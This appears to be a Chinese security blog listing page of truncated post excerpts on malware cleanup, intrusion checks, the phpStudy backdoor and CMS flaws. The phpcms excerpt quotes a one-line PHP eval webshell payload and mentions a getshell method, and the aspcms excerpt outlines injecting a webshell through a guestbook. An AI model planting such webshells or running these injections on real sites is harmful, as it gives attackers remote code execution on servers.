进程跟踪软件使用教程,可用于查木马,网站访问慢,程序涉及一些权限错误等问题排查 一.windows: http://soft.lnmpweb.cn/zdir-master/win/Procmon.exe 下载后直接双击运行  开始/停止进程跟踪  屏幕自动滚动  清除屏幕内容  筛选器 如果服务器站点较多,会比较卡,打开软件后,先点击停止进程跟踪,…

今天在处理phpcms挂马的时候遇到一个一句话木马cachesconfigssystem.php  \',@eval/**/($_POST[123]),// 想了一下这个应该是网站后台写入配置文件，就网上找了一下getshell方法，记录一下 内容仅供测试使用，请遵守网络安全法 v9.6.3 安装完后登陆后台 http://127.0.0.1/ph…

在日常繁琐的运维工作中，对linux服务器进行安全检查是一个非常重要的环节。今天，分享一下如何检查linux系统是否遭受了入侵？ 一、是否入侵检查 1）检查系统日志 检查系统错误登陆日志，统计IP重试次数（last命令是查看系统登陆日志，比如系统被reboot或登陆情况） [root@bastion-IDC ~]# last 2）检查系统用户 查看…

注意。此功能已经更新。点击修复面板即可使用。（Linux内测版本7.1.16） 宝塔内置webshell 查杀 一、 设置消息通道 1.1 设置邮件通道 注意这里是STMP密码不是你的qq密码 怎么设置STMP的密码如下链接 https://jingyan.baidu.com/article/6079ad0eb14aaa28fe86db5a.htm…

windows映像劫持技术（IFEO）介绍以及常用解决方案(转) 转自比特论坛，作者skyshine 今天在JM看到有关一个IFEO病毒的分析报告，就想写点什么和大家分享下！ 为了使大家更详细了解映像胁持，在BAIDU找了一些相关知识点，在此，感谢那些原创作者！谢谢！ QUOTE: 基本症状：可能有朋友遇到过这样的情况，一个正常的程序，无论把他放在…

PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击，程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。经过分析除了有反向连接木马之外，还可以正向执行任意php代码。 影响版本及路径 通过分析，后门代码存在于extphp_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、p…

aspcms主要是信息发布系统，影响版本为asp。漏洞成因，在留言板处对信息处理不当，导致代码注入。可直接将一句话木马插入数据库。数据库默认配置为asp.目录在/data/data.asp下。利用方法，保证默认数据库路径末更改及可留言，就算不能留言，可构造，经测试，基本上末更改   aspcms主要是信息发布系统，影响版本为asp。 漏洞…

Scanners Box是一个集合github平台上的安全行业从业者自研开源扫描器的仓库，包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器，同时该仓库只收录各位网友自己编写的一般性开源扫描器，类似awvs、nmap、w3af等知名扫描工具不收录   子域名枚举扫描器或爆破工具 htt…

crontab命令是Unix和Linux用于设置周期性被执行的指令，是互联网很常用的技术，很多任务都会设置在crontab循环执行 如果不使用crontab，那么任务就是常驻程序，这对你的程序要求比较高，一个要求你的程序是24X7小时不宕机，一个是要求你的调度程序比较可靠，实际工作中，90%的程序都没有必要花这么多时间和精力去解决上面的两个问题的，…

 2018年结束对过去一年的网络安全事件进行了概括总结，正文如下 01.电子邮件仍然是一种流行的攻击媒介 员工电子邮箱成为所有公司需要面临的最大威胁。电子邮件是最受欢迎的威胁媒介之一，它越来越多地被网络犯罪分子用作网络钓鱼、恶意软件和企业电子邮件泄露(BEC)诈骗的媒介。根据2018年电子邮件安全趋势报告，93%的漏洞包括网络钓鱼(或鱼叉…